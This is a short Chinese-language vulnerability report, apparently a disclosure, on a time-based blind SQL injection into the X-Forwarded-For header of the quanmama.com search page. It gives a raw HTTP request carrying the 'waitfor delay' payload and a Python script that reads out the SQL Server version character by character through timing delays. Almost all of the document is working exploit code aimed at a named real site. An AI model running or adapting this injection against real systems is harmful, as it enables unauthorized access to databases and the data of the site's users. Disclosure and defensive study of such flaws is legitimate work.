券妈妈MSSQL注射(sa权限&附验证脚本)

GET /zhisearch/ HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 X-Forwarded-For: 127.0.0.1'); waitfor delay '0:0:1' --
 X-Requested-With: XMLHttpRequest
 Referer: http://www.quanmama.com
 Host: www.quanmama.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 Accept: */*

sa

import httplib
 import time
 import string
 import sys
 import random
 import urllib
 
 headers = {
     'Cookie': '',
     'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
 }
 
 payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.-// ')
 
 print 'Try to retrive SQL Server Version:'
 user = ''
 for i in range(1,30,1):
     for payload in payloads:
         timeout_count = 0
         for j in range(1,3):
             try:
                 conn = httplib.HTTPConnection('www.quanmama.com', timeout=3)
                 random.seed()
                 x_forwarded_for = str(random.random()) + "127.0.0.1'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:3' -- "  % (i, ord(payload))
                 headers['X-Forwarded-For'] = x_forwarded_for
                 conn.request(method='GET',
                              url= '/zhisearch/',
                              headers = headers)
                 conn.getresponse()
                 conn.close()
                 print '.',
                 break
             except:
                 timeout_count += 1
         if timeout_count == 2:    # 2 times to confirm
             user += payload
             print '[In Progress]', user 
             break
 
 print '/n[Done], SQL Server version is', user